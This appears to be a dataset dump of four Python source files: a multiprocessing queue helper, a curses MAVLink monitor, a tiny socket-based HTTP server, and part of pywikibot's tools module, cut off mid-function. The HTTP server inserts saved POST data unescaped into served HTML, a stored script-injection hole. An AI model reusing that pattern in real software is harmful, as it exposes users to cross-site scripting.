source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
multiproc_data.py
|
from __future__ import print_function
from ctypes import c_bool
import multiprocessing as mp
try:
from queue import Full as QFullExcept
from queue import Empty as QEmptyExcept
except ImportError:
from Queue import Full as QFullExcept
from Queue import Empty as QEmptyExcept
import numpy as np
class MPData(object):
"""
Handles multi-process data generation.
Operation:
- call start() to start the data generation.
- call get() (blocking) to read one sample
- call reset() to stop data generation
"""
def __init__(self, num_processes, max_queue_size, fn):
self.queue = mp.Queue(maxsize=int(max_queue_size))
self.alive = mp.Value(c_bool, False, lock=False)
self.num_proc = num_processes
self.proc = list()
self.fn = fn
def start(self):
self._init_proc()
@staticmethod
def _proc_loop(proc_id, alive, queue, fn):
"""
proc_id: int
Process id
alive: multiprocessing.Value
variable for signaling whether process should continue or not
queue: multiprocessing.Queue
queue for passing data back
fn: function
func obj that returns a sample to be pushed into the queue
"""
print('proc {} started'.format(proc_id))
try:
while alive.value:
data = fn()
put_success = False
while alive.value and not put_success:
try:
queue.put(data, timeout=0.5)
put_success = True
except QFullExcept:
pass
except KeyboardInterrupt:
print("W: interrupt received, stopping process {} ...".format(proc_id))
print("closing process {}".format(proc_id))
queue.close()
def _init_proc(self):
if not self.proc:
self.proc = [mp.Process(target=self._proc_loop, args=(i, self.alive, self.queue, self.fn)) for i in range(self.num_proc)]
self.alive.value = True
for p in self.proc:
p.start()
def get(self):
self._init_proc()
return self.queue.get()
def reset(self):
self.alive.value = False
qsize = 0
try:
while True:
self.queue.get(timeout=0.1)
qsize += 1
except QEmptyExcept:
pass
print("Queue size on reset: {}".format(qsize))
for i, p in enumerate(self.proc):
p.join()
self.proc.clear()
|
mavtop.py
|
from __future__ import print_function
import sys,os
import curses
import time
import threading
from pymavlink import mavutil
from argparse import ArgumentParser
from Vehicle import Vehicle
from Screen import Screen
list = []
def findvehicle(id, list):
for i in range(0, len(list)):
if (id == list[i].sys_id):
return i
return -1
def draw_menu(stdscr):
k = 0
global list
screen = Screen()
# Clear and refresh the screen for a blank canvas
stdscr.clear()
stdscr.refresh()
# Start colors in curses
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(4, curses.COLOR_BLACK, curses.COLOR_CYAN)
# Loop where k is the last character pressed
while (k != ord('q')):
# Initialization
stdscr.clear()
height, width = stdscr.getmaxyx()
screen.setSize(height, width)
screen.moveCursor(stdscr, k)
cursor_y = screen.getCursor()
cursor_x = screen.getCursorX()
# Render Elements
screen.drawHeader(stdscr, list)
screen.drawTable(stdscr, list)
screen.drawStatusBar(stdscr)
# Refresh the screen
stdscr.refresh()
# Wait for next input
k = stdscr.getch()
def mavlinkThread():
connection = mavutil.mavlink_connection('udpin:0.0.0.0:14550')
global list
while True:
msg = connection.recv_match(type='HEARTBEAT', blocking=True)
sys_id = connection.target_system
vehicle_id = findvehicle(sys_id, list)
sys_status = msg.system_status
mav_type = msg.type
mav_autopilot = msg.autopilot
mav_mode_flag = msg.base_mode
mavlink_version = msg.mavlink_version
if vehicle_id < 0 :
vehicle = Vehicle(sys_id, mav_type, mav_autopilot, mav_mode_flag, sys_status, mavlink_version) # Create vehicle object if the vehicle was not seen before
list.append(vehicle)
else:
list[vehicle_id].sys_id = sys_id
list[vehicle_id].mav_state = msg.system_status
def main():
parser = ArgumentParser(description=__doc__)
parser.add_argument("--baudrate", type=int,
help="master port baud rate", default=115200)
parser.add_argument("--device", required=False, help="serial device")
args = parser.parse_args()
t = threading.Thread(name='daemon', target=mavlinkThread)
t.setDaemon(True)
t.start()
curses.wrapper(draw_menu)
if __name__ == "__main__":
main()
|
server_TCP_modified.py
|
import socket
import threading
host = '127.0.0.1'
port = 9999
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.bind((host,port))
sock.listen(5)
saved = b''
def tcplink(conn, addr):
global saved
# print(conn, addr)
request = conn.recv(1024)
if request[0:3] == b'GET':
# HTTP response message
response = b'HTTP/1.1 200 OK\nContent-Type:text/html\r\n\r\n' \
b'<html><body><form method="post"><input name="name" value="' + saved + b'">' \
b'<button type="submit">Save</button></form></body></html>'
conn.sendall(response)
elif request[0:4] == b"POST":
pos = request.find(b"\r\n\r\n")
content = request[pos + 4:]
response = b'HTTP/1.1 303 See Other\r\n' \
b'Location:/\r\n\r\n'
saved = content[5:] # b'name=
conn.sendall(response)
# print(content)
# print(saved)
conn.close()
def thread_func():
global sock
print("thread started")
while 1:
conn, addr = sock.accept()
tcplink(conn, addr)
num_thread = 8
for i in range(num_thread):
t = threading.Thread(target=thread_func)
t.start()
|
__init__.py
|
# -*- coding: utf-8 -*-
"""Miscellaneous helper functions (not wiki-dependent)."""
#
# (C) Pywikibot team, 2008-2017
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, unicode_literals
__version__ = '$Id: 7e1c9c15b0d121bbe9e36717aa3be86d42ac86c0 $'
import collections
import gzip
import hashlib
import inspect
import itertools
import os
import re
import stat
import subprocess
import sys
import threading
import time
import types
from distutils.version import Version
from warnings import warn
PYTHON_VERSION = sys.version_info[:3]
PY2 = (PYTHON_VERSION[0] == 2)
if not PY2:
import queue as Queue
StringTypes = basestring = (str,)
UnicodeType = unicode = str
else:
import Queue
StringTypes = types.StringTypes
UnicodeType = types.UnicodeType
from pywikibot.logging import debug
try:
import bz2
except ImportError as bz2_import_error:
try:
import bz2file as bz2
warn('package bz2 was not found; using bz2file', ImportWarning)
except ImportError:
warn('package bz2 and bz2file were not found', ImportWarning)
bz2 = bz2_import_error
if PYTHON_VERSION < (3, 5):
# although deprecated in 3 completely no message was emitted until 3.5
ArgSpec = inspect.ArgSpec
getargspec = inspect.getargspec
else:
ArgSpec = collections.namedtuple('ArgSpec', ['args', 'varargs', 'keywords',
'defaults'])
def getargspec(func):
"""Python 3 implementation using inspect.signature."""
sig = inspect.signature(func)
args = []
defaults = []
varargs = None
kwargs = None
for p in sig.parameters.values():
if p.kind == inspect.Parameter.VAR_POSITIONAL:
varargs = p.name
elif p.kind == inspect.Parameter.VAR_KEYWORD:
kwargs = p.name
else:
args += [p.name]
if p.default != inspect.Parameter.empty:
defaults += [p.default]
if defaults:
defaults = tuple(defaults)
else:
defaults = None
return ArgSpec(args, varargs, kwargs, defaults)
_logger = 'tools'
class _NotImplementedWarning(RuntimeWarning):
"""Feature that is no longer implemented."""
pass
class NotImplementedClass(object):
"""No implementation is available."""
def __init__(self, *args, **kwargs):
"""Constructor."""
raise NotImplementedError(
'%s: %s' % (self.__class__.__name__, self.__doc__))
if PYTHON_VERSION < (2, 7):
try:
import future.backports.misc
except ImportError:
warn("""
pywikibot support of Python 2.6 relies on package future for many features.
Please upgrade to Python 2.7+ or Python 3.3+, or run:
"pip install future>=0.15.0"
""", RuntimeWarning)
try:
from ordereddict import OrderedDict
except ImportError:
class OrderedDict(NotImplementedClass):
"""OrderedDict not found."""
pass
try:
from counter import Counter
except ImportError:
class Counter(NotImplementedClass):
"""Counter not found."""
pass
count = None
else:
Counter = future.backports.misc.Counter
OrderedDict = future.backports.misc.OrderedDict
try:
count = future.backports.misc.count
except AttributeError:
warn('Please update the "future" package to at least version '
'0.15.0 to use its count.', RuntimeWarning, 2)
count = None
del future
if count is None:
def count(start=0, step=1):
"""Backported C{count} to support keyword arguments and step."""
while True:
yield start
start += step
else:
Counter = collections.Counter
OrderedDict = collections.OrderedDict
count = itertools.count
def has_module(module):
"""Check whether a module can be imported."""
try:
__import__(module)
except ImportError:
return False
else:
return True
def empty_iterator():
# http://stackoverflow.com/a/13243870/473890
"""An iterator which does nothing."""
return
yield
def py2_encode_utf_8(func):
"""Decorator to optionally encode the string result of a function on Python 2.x."""
if PY2:
return lambda s: func(s).encode('utf-8')
else:
return func
class classproperty(object): # flake8: disable=N801
"""
Metaclass to accesss a class method as a property.
This class may be used as a decorator::
class Foo(object):
_bar = 'baz' # a class property
@classproperty
def bar(cls): # a class property method
return cls._bar
Foo.bar gives 'baz'.
"""
def __init__(self, cls_method):
"""Hold the class method."""
self.method = cls_method
def __get__(self, instance, owner):
"""Get the attribute of the owner class by its method."""
return self.method(owner)
class UnicodeMixin(object):
"""Mixin class to add __str__ method in Python 2 or 3."""
@py2_encode_utf_8
def __str__(self):
"""Return the unicode representation as the str representation."""
return self.__unicode__()
# From http://python3porting.com/preparing.html
class ComparableMixin(object):
"""Mixin class to allow comparing to other objects which are comparable."""
def __lt__(self, other):
"""Compare if self is less than other."""
return other > self._cmpkey()
def __le__(self, other):
"""Compare if self is less equals other."""
return other >= self._cmpkey()
def __eq__(self, other):
"""Compare if self is equal to other."""
return other == self._cmpkey()
def __ge__(self, other):
"""Compare if self is greater equals other."""
return other <= self._cmpkey()
def __gt__(self, other):
"""Compare if self is greater than other."""
return other < self._cmpkey()
def __ne__(self, other):
"""Compare if self is not equal to other."""
return other != self._cmpkey()
class DotReadableDict(UnicodeMixin):
"""Parent class of Revision() and FileInfo().
Provide:
- __getitem__(), __unicode__() and __repr__().
"""
def __getitem__(self, key):
"""Give access to class values by key.
Revision class may also give access to its values by keys
e.g. revid parameter may be assigned by revision['revid']
as well as revision.revid. This makes formatting strings with
% operator easier.
"""
return getattr(self, key)
def __unicode__(self):
"""Return string representation."""
# TODO: This is more efficient if the PY2 test is done during
# class instantiation, and not inside the method.
if not PY2:
return repr(self.__dict__)
else:
_content = u', '.join(
u'{0}: {1}'.format(k, v) for k, v in self.__dict__.items())
return u'{{{0}}}'.format(_content)
def __repr__(self):
"""Return a more complete string representation."""
return repr(self.__dict__)
class FrozenDict(dict):
"""
Frozen dict, preventing write after initialisation.
Raises TypeError if write attempted.
"""
def __init__(self, data=None, error=None):
"""
Constructor.
@param data: mapping to freeze
@type data: mapping
@param error: error message
@type error: basestring
"""
if data:
args = [data]
else:
args = []
super(FrozenDict, self).__init__(*args)
self._error = error or 'FrozenDict: not writable'
def update(self, *args, **kwargs):
"""Prevent updates."""
raise TypeError(self._error)
__setitem__ = update
def concat_options(message, line_length, options):
"""Concatenate options."""
indent = len(message) + 2
line_length -= indent
option_msg = u''
option_line = u''
for option in options:
if option_line:
option_line += ', '
# +1 for ','
if len(option_line) + len(option) + 1 > line_length:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line[:-1] # remove space
option_line = ''
option_line += option
if option_line:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line
return u'{0} ({1}):'.format(message, option_msg)
class LazyRegex(object):
"""
Regex object that obtains and compiles the regex on usage.
Instances behave like the object created using L{re.compile}.
"""
def __init__(self, pattern, flags=0):
"""
Constructor.
@param pattern: L{re} regex pattern
@type pattern: str or callable
@param flags: L{re.compile} flags
@type flags: int
"""
self.raw = pattern
self.flags = flags
super(LazyRegex, self).__init__()
@property
def raw(self):
"""Get raw property."""
if callable(self._raw):
self._raw = self._raw()
return self._raw
@raw.setter
def raw(self, value):
"""Set raw property."""
self._raw = value
self._compiled = None
@property
def flags(self):
"""Get flags property."""
return self._flags
@flags.setter
def flags(self, value):
"""Set flags property."""
self._flags = value
self._compiled = None
def __getattr__(self, attr):
"""Compile the regex and delegate all attribute to the regex."""
if self._raw:
if not self._compiled:
self._compiled = re.compile(self.raw, self.flags)
if hasattr(self._compiled, attr):
return getattr(self._compiled, attr)
raise AttributeError('%s: attr %s not recognised'
% (self.__class__.__name__, attr))
else:
raise AttributeError('%s.raw not set' % self.__class__.__name__)
class DeprecatedRegex(LazyRegex):
"""Regex object that issues a deprecation notice."""
def __init__(self, pattern, flags=0, name=None, instead=None):
"""
Constructor.
If name is None, the regex pattern will be used as part of
the deprecation warning.
@param name: name of the object that is deprecated
@type name: str or None
@param instead: if provided, will be used to specify the replacement
of the deprecated name
@type instead: str
"""
super(DeprecatedRegex, self).__init__(pattern, flags)
self._name = name or self.raw
self._instead = instead
def __getattr__(self, attr):
"""Issue deprecation warning."""
issue_deprecation_warning(
self._name, self._instead, 2)
return super(DeprecatedRegex, self).__getattr__(attr)
def first_lower(string):
"""
Return a string with the first character uncapitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].lower() + string[1:]
def first_upper(string):
"""
Return a string with the first character capitalized.
Empty strings are supported. The original string is not changed.
"""
return string[:1].upper() + string[1:]
def normalize_username(username):
"""Normalize the username."""
if not username:
return None
username = re.sub('[_ ]+', ' ', username).strip()
return first_upper(username)
class MediaWikiVersion(Version):
"""
Version object to allow comparing 'wmf' versions with normal ones.
The version mainly consist of digits separated by periods. After that is a
suffix which may only be 'wmf<number>', 'alpha', 'beta<number>' or
'-rc.<number>' (the - and . are optional). They are considered from old to
new in that order with a version number without suffix is considered the
newest. This secondary difference is stored in an internal _dev_version
attribute.
Two versions are equal if their normal version and dev version are equal. A
version is greater if the normal version or dev version is greater. For
example:
1.24 < 1.24.1 < 1.25wmf1 < 1.25alpha < 1.25beta1 < 1.25beta2
< 1.25-rc-1 < 1.25-rc.2 < 1.25
Any other suffixes are considered invalid.
"""
MEDIAWIKI_VERSION = re.compile(
r'^(\d+(?:\.\d+)+)(-?wmf\.?(\d+)|alpha|beta(\d+)|-?rc\.?(\d+)|.*)?$')
@classmethod
def from_generator(cls, generator):
"""Create instance using the generator string."""
if not generator.startswith('MediaWiki '):
raise ValueError('Generator string ({0!r}) must start with '
'"MediaWiki "'.format(generator))
return cls(generator[len('MediaWiki '):])
def parse(self, vstring):
"""Parse version string."""
version_match = MediaWikiVersion.MEDIAWIKI_VERSION.match(vstring)
if not version_match:
raise ValueError('Invalid version number "{0}"'.format(vstring))
components = [int(n) for n in version_match.group(1).split('.')]
# The _dev_version numbering scheme might change. E.g. if a stage
# between 'alpha' and 'beta' is added, 'beta', 'rc' and stable releases
# are reassigned (beta=3, rc=4, stable=5).
if version_match.group(3): # wmf version
self._dev_version = (0, int(version_match.group(3)))
elif version_match.group(4):
self._dev_version = (2, int(version_match.group(4)))
elif version_match.group(5):
self._dev_version = (3, int(version_match.group(5)))
elif version_match.group(2) in ('alpha', '-alpha'):
self._dev_version = (1, )
else:
for handled in ('wmf', 'alpha', 'beta', 'rc'):
# if any of those pops up here our parser has failed
assert handled not in version_match.group(2), \
'Found "{0}" in "{1}"'.format(handled, version_match.group(2))
if version_match.group(2):
debug('Additional unused version part '
'"{0}"'.format(version_match.group(2)),
_logger)
self._dev_version = (4, )
self.suffix = version_match.group(2) or ''
self.version = tuple(components)
def __str__(self):
"""Return version number with optional suffix."""
return '.'.join(str(v) for v in self.version) + self.suffix
def _cmp(self, other):
if isinstance(other, basestring):
other = MediaWikiVersion(other)
if self.version > other.version:
return 1
if self.version < other.version:
return -1
if self._dev_version > other._dev_version:
return 1
if self._dev_version < other._dev_version:
return -1
return 0
if PY2:
__cmp__ = _cmp
class ThreadedGenerator(threading.Thread):
"""Look-ahead generator class.
Runs a generator in a separate thread and queues the results; can
be called like a regular generator.
Subclasses should override self.generator, I{not} self.run
Important: the generator thread will stop itself if the generator's
internal queue is exhausted; but, if the calling program does not use
all the generated values, it must call the generator's stop() method to
stop the background thread. Example usage:
>>> gen = ThreadedGenerator(target=range, args=(20,))
>>> try:
... data = list(gen)
... finally:
... gen.stop()
>>> data
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
"""
def __init__(self, group=None, target=None, name="GeneratorThread",
args=(), kwargs=None, qsize=65536):
"""Constructor. Takes same keyword arguments as threading.Thread.
target must be a generator function (or other callable that returns
an iterable object).
@param qsize: The size of the lookahead queue. The larger the qsize,
the more values will be computed in advance of use (which can eat
up memory and processor time).
@type qsize: int
"""
if kwargs is None:
kwargs = {}
if target:
self.generator = target
if not hasattr(self, "generator"):
raise RuntimeError("No generator for ThreadedGenerator to run.")
self.args, self.kwargs = args, kwargs
threading.Thread.__init__(self, group=group, name=name)
self.queue = Queue.Queue(qsize)
self.finished = threading.Event()
def __iter__(self):
"""Iterate results from the queue."""
if not self.isAlive() and not self.finished.isSet():
self.start()
# if there is an item in the queue, yield it, otherwise wait
while not self.finished.isSet():
try:
yield self.queue.get(True, 0.25)
except Queue.Empty:
pass
except KeyboardInterrupt:
self.stop()
def stop(self):
"""Stop the background thread."""
self.finished.set()
def run(self):
"""Run the generator and store the results on the queue."""
iterable = any(hasattr(self.generator, key)
for key in ('__iter__', '__getitem__'))
if iterable and not self.args and not self.kwargs:
self.__gen = self.generator
else:
self.__gen = self.generator(*self.args, **self.kwargs)
for result in self.__gen:
while True:
if self.finished.isSet():
return
try:
self.queue.put_nowait(result)
except Queue.Full:
time.sleep(0.25)
continue
break
# wait for queue to be emptied, then kill the thread
while not self.finished.isSet() and not self.queue.empty():
time.sleep(0.25)
self.stop()
def itergroup(iterable, size):
"""Make an iterator that returns lists of (up to) size items from iterable.
Example:
>>> i = itergroup(range(25), 10)
>>> print(next(i))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> print(next(i))
[10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
>>> print(next(i))
[20, 21, 22, 23, 24]
>>> print(next(i))
Traceback (most recent call last):
...
StopIteration
"""
group = []
for item in iterable:
group.append(item)
if len(group) == size:
yield group
group = []
if group:
yield group
def islice_with_ellipsis(iterable, *args, **kwargs):
u"""
Generator which yields the first n elements of the iterable.
If more elements are available and marker is True, it returns an extra
string marker as continuation mark.
Function takes the
and the additional keyword marker.
@param iterable: the iterable to work on
@type iterable: iterable
@param args: same args as:
- C{itertools.islice(iterable, stop)}
- C{itertools.islice(iterable, start, stop[, step])}
@keyword marker: element to yield if iterable still contains elements
after showing the required number.
Default value: '…'
No other kwargs are considered.
@type marker: str
"""
s = slice(*args)
marker = kwargs.pop('marker', '…')
try:
k, v = kwargs.popitem()
raise TypeError(
"islice_with_ellipsis() take only 'marker' as keyword arg, not %s"
% k)
except KeyError:
pass
_iterable = iter(iterable)
for el in itertools.islice(_iterable, *args):
yield el
if marker and s.stop is not None:
try:
next(_iterable)
except StopIteration:
pass
else:
yield marker
class ThreadList(list):
"""A simple threadpool class to limit the number of simultaneous threads.
Any threading.Thread object can be added to the pool using the append()
method. If the maximum number of simultaneous threads has not been reached,
the Thread object will be started immediately; if not, the append() call
will block until the thread is able to start.
>>> pool = ThreadList(limit=10)
>>> def work():
... time.sleep(1)
...
>>> for x in range(20):
... pool.append(threading.Thread(target=work))
...
"""
_logger = "threadlist"
def __init__(self, limit=128, *args):
"""Constructor."""
self.limit = limit
super(ThreadList, self).__init__(*args)
for item in self:
if not isinstance(threading.Thread, item):
raise TypeError("Cannot add '%s' to ThreadList" % type(item))
def active_count(self):
"""Return the number of alive threads, and delete all non-alive ones."""
cnt = 0
for item in self[:]:
if item.isAlive():
cnt += 1
else:
self.remove(item)
return cnt
def append(self, thd):
"""Add a thread to the pool and start it."""
if not isinstance(thd, threading.Thread):
raise TypeError("Cannot append '%s' to ThreadList" % type(thd))
while self.active_count() >= self.limit:
time.sleep(2)
super(ThreadList, self).append(thd)
thd.start()
debug("thread %d ('%s') started" % (len(self), type(thd)),
self._logger)
def stop_all(self):
"""Stop all threads the pool."""
if self:
debug(u'EARLY QUIT: Threads: %d' % len(self), self._logger)
for thd in self:
thd.stop()
debug(u'EARLY QUIT: Queue size left in %s: %s'
% (thd, thd.queue.qsize()), self._logger)
def intersect_generators(genlist):
"""
Intersect generators listed in genlist.
Yield items only if they are yielded by all generators in genlist.
Threads (via ThreadedGenerator) are used in order to run generators
in parallel, so that items can be yielded before generators are
exhausted.
Threads are stopped when they are either exhausted or Ctrl-C is pressed.
Quitting before all generators are finished is attempted if
there is no more chance of finding an item in all queues.
@param genlist: list of page generators
@type genlist: list
"""
# If any generator is empty, no pages are going to be returned
for source in genlist:
if not source:
debug('At least one generator ({0!r}) is empty and execution was '
'skipped immediately.'.format(source), 'intersect')
return
# Item is cached to check that it is found n_gen
# times before being yielded.
cache = collections.defaultdict(set)
n_gen = len(genlist)
# Class to keep track of alive threads.
# Start new threads and remove completed threads.
thrlist = ThreadList()
for source in genlist:
threaded_gen = ThreadedGenerator(name=repr(source), target=source)
threaded_gen.daemon = True
thrlist.append(threaded_gen)
while True:
# Get items from queues in a round-robin way.
for t in thrlist:
try:
# TODO: evaluate if True and timeout is necessary.
item = t.queue.get(True, 0.1)
# Cache entry is a set of thread.
# Duplicates from same thread are not counted twice.
cache[item].add(t)
if len(cache[item]) == n_gen:
yield item
# Remove item from cache.
# No chance of seeing it again (see later: early stop).
cache.pop(item)
active = thrlist.active_count()
max_cache = n_gen
if cache.values():
max_cache = max(len(v) for v in cache.values())
# No. of active threads is not enough to reach n_gen.
# We can quit even if some thread is still active.
# There could be an item in all generators which has not yet
# appeared from any generator. Only when we have lost one
# generator, then we can bail out early based on seen items.
if active < n_gen and n_gen - max_cache > active:
thrlist.stop_all()
return
except Queue.Empty:
pass
except KeyboardInterrupt:
thrlist.stop_all()
finally:
# All threads are done.
if thrlist.active_count() == 0:
return
def filter_unique(iterable, container=None, key=None, add=None):
"""
Yield unique items from an iterable, omitting duplicates.
By default, to provide uniqueness, it puts the generated items into
the keys of a dict created as a local variable, each with a value of True.
It only yields items which are not already present in the local dict.
For large collections, this is not memory efficient, as a strong reference
to every item is kept in a local dict which can not be cleared.
Also, the local dict cant be re-used when chaining unique operations on
multiple generators.
To avoid these issues, it is advisable for the caller to provide their own
container and set the key parameter to be the function L{hash}, or use a
L{weakref} as the key.
The container can be any object that supports __contains__.
If the container is a set or dict, the method add or __setitem__ will be
used automatically. Any other method may be provided explicitly using the
add parameter.
Beware that key=id is only useful for cases where id() is not unique.
Note: This is not thread safe.
@param iterable: the source iterable
@type iterable: collections.Iterable
@param container: storage of seen items
@type container: type
@param key: function to convert the item to a key
@type key: callable
@param add: function to add an item to the container
@type add: callable
"""
if container is None:
container = {}
if not add:
if hasattr(container, 'add'):
def container_add(x):
container.add(key(x) if key else x)
add = container_add
else:
def container_setitem(x):
container.__setitem__(key(x) if key else x,
True)
add = container_setitem
for item in iterable:
try:
if (key(item) if key else item) not in container:
add(item)
yield item
except StopIteration:
return
class CombinedError(KeyError, IndexError):
"""An error that gets caught by both KeyError and IndexError."""
class EmptyDefault(str, collections.Mapping):
"""
A default for a not existing siteinfo property.
It should be chosen if there is no better default known. It acts like an
empty collections, so it can be iterated through it savely if treated as a
list, tuple, set or dictionary. It is also basically an empty string.
Accessing a value via __getitem__ will result in an combined KeyError and
IndexError.
"""
def __init__(self):
"""Initialise the default as an empty string."""
str.__init__(self)
def _empty_iter(self):
"""An iterator which does nothing and drops the argument."""
return empty_iterator()
def __getitem__(self, key):
"""Raise always a L{CombinedError}."""
raise CombinedError(key)
iteritems = itervalues = iterkeys = __iter__ = _empty_iter
EMPTY_DEFAULT = EmptyDefault()
class SelfCallMixin(object):
"""
Return self when called.
When '_own_desc' is defined it'll also issue a deprecation warning using
issue_deprecation_warning('Calling ' + _own_desc, 'it directly').
"""
def __call__(self):
"""Do nothing and just return itself."""
if hasattr(self, '_own_desc'):
issue_deprecation_warning('Calling {0}'.format(self._own_desc),
'it directly', 2)
return self
class SelfCallDict(SelfCallMixin, dict):
"""Dict with SelfCallMixin."""
class SelfCallString(SelfCallMixin, str):
"""Unicode string with SelfCallMixin."""
class IteratorNextMixin(collections.Iterator):
"""Backwards compatibility for Iterators."""
if PY2:
def next(self):
"""Python 2 next."""
return self.__next__()
class DequeGenerator(IteratorNextMixin, collections.deque):
"""A generator that allows items to be added during generating."""
def __next__(self):
"""Python 3 iterator method."""
if len(self):
return self.popleft()
else:
raise StopIteration
class ContextManagerWrapper(object):
"""
Wraps an object in a context manager.
It is redirecting all access to the wrapped object and executes 'close' when
used as a context manager in with-statements. In such statements the value
set via 'as' is directly the wrapped object. For example:
>>> class Wrapper(object):
... def close(self): pass
>>> an_object = Wrapper()
>>> wrapped = ContextManagerWrapper(an_object)
>>> with wrapped as another_object:
... assert another_object is an_object
It does not subclass the object though, so isinstance checks will fail
outside a with-statement.
"""
def __init__(self, wrapped):
"""Create a new wrapper."""
super(ContextManagerWrapper, self).__init__()
super(ContextManagerWrapper, self).__setattr__('_wrapped', wrapped)
def __enter__(self):
"""Enter a context manager and use the wrapped object directly."""
return self._wrapped
def __exit__(self, exc_type, exc_value, traceback):
"""Call close on the wrapped object when exiting a context manager."""
self._wrapped.close()
def __getattr__(self, name):
"""Get the attribute from the wrapped object."""
return getattr(self._wrapped, name)
def __setattr__(self, name, value):
"""Set the attribute in the wrapped object."""
setattr(self._wrapped, name, value)
def open_archive(filename, mode='rb', use_extension=True):
"""
Open a file and uncompress it if needed.
This function supports bzip2, gzip and 7zip as compression containers. It
uses the packages available in the standard library for bzip2 and gzip so
they are always available. 7zip is only available when a 7za program is
available and only supports reading from it.
The compression is either selected via the magic number or file ending.
@param filename: The filename.
@type filename: str
@param use_extension: Use the file extension instead of the magic number
to determine the type of compression (default True). Must be True when
writing or appending.
@type use_extension: bool
@param mode: The mode in which the file should be opened. It may either be
'r', 'rb', 'a', 'ab', 'w' or 'wb'. All modes open the file in binary
mode. It defaults to 'rb'.
@type mode: string
@raises ValueError: When 7za is not available or the opening mode is unknown
or it tries to write a 7z archive.
@raises FileNotFoundError: When the filename doesn't exist and it tries
to read from it or it tries to determine the compression algorithm (or
IOError on Python 2).
@raises OSError: When it's not a 7z archive but the file extension is 7z.
It is also raised by bz2 when its content is invalid. gzip does not
immediately raise that error but only on reading it.
@return: A file-like object returning the uncompressed data in binary mode.
Before Python 2.7 the GzipFile object and before 2.7.1 the BZ2File are
wrapped in a ContextManagerWrapper with its advantages/disadvantages.
@rtype: file-like object
"""
def wrap(wrapped, sub_ver):
"""Wrap in a wrapper when this is below Python version 2.7."""
if PYTHON_VERSION < (2, 7, sub_ver):
return ContextManagerWrapper(wrapped)
else:
return wrapped
if mode in ('r', 'a', 'w'):
mode += 'b'
elif mode not in ('rb', 'ab', 'wb'):
raise ValueError('Invalid mode: "{0}"'.format(mode))
if use_extension:
# if '.' not in filename, it'll be 1 character long but otherwise
# contain the period
extension = filename[filename.rfind('.'):][1:]
else:
if mode != 'rb':
raise ValueError('Magic number detection only when reading')
with open(filename, 'rb') as f:
magic_number = f.read(8)
if magic_number.startswith(b'BZh'):
extension = 'bz2'
elif magic_number.startswith(b'\x1F\x8B\x08'):
extension = 'gz'
elif magic_number.startswith(b"7z\xBC\xAF'\x1C"):
extension = '7z'
else:
extension = ''
if extension == 'bz2':
if isinstance(bz2, ImportError):
raise bz2
return wrap(bz2.BZ2File(filename, mode), 1)
elif extension == 'gz':
return wrap(gzip.open(filename, mode), 0)
elif extension == '7z':
if mode != 'rb':
raise NotImplementedError('It is not possible to write a 7z file.')
try:
process = subprocess.Popen(['7za', 'e', '-bd', '-so', filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=65535)
except OSError:
raise ValueError('7za is not installed or cannot '
'uncompress "{0}"'.format(filename))
else:
stderr = process.stderr.read()
process.stderr.close()
if stderr != b'':
process.stdout.close()
raise OSError(
'Unexpected STDERR output from 7za {0}'.format(stderr))
else:
return process.stdout
else:
# assume it's an uncompressed file
return open(filename, 'rb')
def merge_unique_dicts(*args, **kwargs):
"""
Return a merged dict and making sure that the original dicts had unique keys.
The positional arguments are the dictionaries to be merged. It is also
possible to define an additional dict using the keyword arguments.
"""
args = list(args) + [dict(kwargs)]
conflicts = set()
result = {}
for arg in args:
conflicts |= set(arg.keys()) & set(result.keys())
result.update(arg)
if conflicts:
raise ValueError('Multiple dicts contain the same keys: '
'{0}'.format(', '.join(sorted(unicode(key) for key in conflicts))))
return result
# Decorators
#
# Decorator functions without parameters are _invoked_ differently from
# decorator functions with function syntax. For example, @deprecated causes
# a different invocation to @deprecated().
# The former is invoked with the decorated function as args[0].
# The latter is invoked with the decorator arguments as *args & **kwargs,
# and it must return a callable which will be invoked with the decorated
# function as args[0].
# The follow deprecators may support both syntax, e.g. @deprecated and
# @deprecated() both work. In order to achieve that, the code inspects
# args[0] to see if it callable. Therefore, a decorator must not accept
# only one arg, and that arg be a callable, as it will be detected as
# a deprecator without any arguments.
def signature(obj):
"""
Safely return function Signature object (PEP 362).
inspect.signature was introduced in 3.3, however backports are available.
In Python 3.3, it does not support all types of callables, and should
not be relied upon. Python 3.4 works correctly.
Any exception calling inspect.signature is ignored and None is returned.
@param obj: Function to inspect
@type obj: callable
@rtype: inpect.Signature or None
"""
try:
return inspect.signature(obj)
except (AttributeError, ValueError):
return None
def add_decorated_full_name(obj, stacklevel=1):
"""Extract full object name, including class, and store in __full_name__.
This must be done on all decorators that are chained together, otherwise
the second decorator will have the wrong full name.
@param obj: A object being decorated
@type obj: object
@param stacklevel: level to use
@type stacklevel: int
"""
if hasattr(obj, '__full_name__'):
return
# The current frame is add_decorated_full_name
# The next frame is the decorator
# The next frame is the object being decorated
frame = sys._getframe(stacklevel + 1)
class_name = frame.f_code.co_name
if class_name and class_name != '<module>':
obj.__full_name__ = (obj.__module__ + '.' +
class_name + '.' +
obj.__name__)
else:
obj.__full_name__ = (obj.__module__ + '.' +
obj.__name__)
def manage_wrapping(wrapper, obj):
"""Add attributes to wrapper and wrapped functions."""
wrapper.__doc__ = obj.__doc__
wrapper.__name__ = obj.__name__
wrapper.__module__ = obj.__module__
wrapper.__signature__ = signature(obj)
if not hasattr(obj, '__full_name__'):
add_decorated_full_name(obj, 2)
wrapper.__full_name__ = obj.__full_name__
# Use the previous wrappers depth, if it exists
wrapper.__depth__ = getattr(obj, '__depth__', 0) + 1
# Obtain the wrapped object from the previous wrapper
wrapped = getattr(obj, '__wrapped__', obj)
wrapper.__wrapped__ = wrapped
# Increment the number of wrappers
